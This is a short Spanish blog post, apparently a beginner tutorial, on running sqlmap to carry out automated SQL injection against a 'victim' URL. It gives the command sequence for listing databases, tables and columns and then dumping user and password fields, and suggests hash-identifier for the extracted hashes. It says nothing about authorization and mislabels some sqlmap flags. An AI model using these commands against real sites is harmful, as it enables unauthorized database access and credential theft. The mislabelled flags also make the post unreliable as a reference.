Bueno en esta entrada vamos a ver como utilizar sqlmap para realizar ataques de sql injection automatizados como lo podemos ver en la entrada anterior de sql injection esta herramienta es una de las más comunes ya que cuenta con varias opciones y ademas es multi plataforma, en el dia de hoy solo les mostrare los comandos básicos para realizar una ataque.
Bueno para los que no tienen sqlmap lo pueden descargar desde GitHub.
Bueno empecemos con la forma de realizar el ataque.
Lo primero que vamos a hacer es abrir sqlmap y poner los siguiente:
sqlmap -u (url) --dbs
en url ponen la url de la victima tal cual como se muestra en el ejemplo
sqlmap -u (url) -D (tabla) --tables
sqlmap -u (url) -D (tabla) -T (columnas) --columns
sqlmap -u (url) -D (tabla) -T (columnas) -C (usuario o contraseña) --dump
Como podemos ver las secuencias son muy sencillas, y prácticamente son repetitivas.
Si quieren conocer más opciones solo es poner:
sqlmap -hh
Bueno las contraseña muchas veces no la de encriptadas, para eso podemos usar hash identifier el cual es muy sencillo de usar y es muy útil.
Bueno espero que les sea de utilidad la información, y los invito a dejar sus comentarios.
Comentarios
Publicar un comentario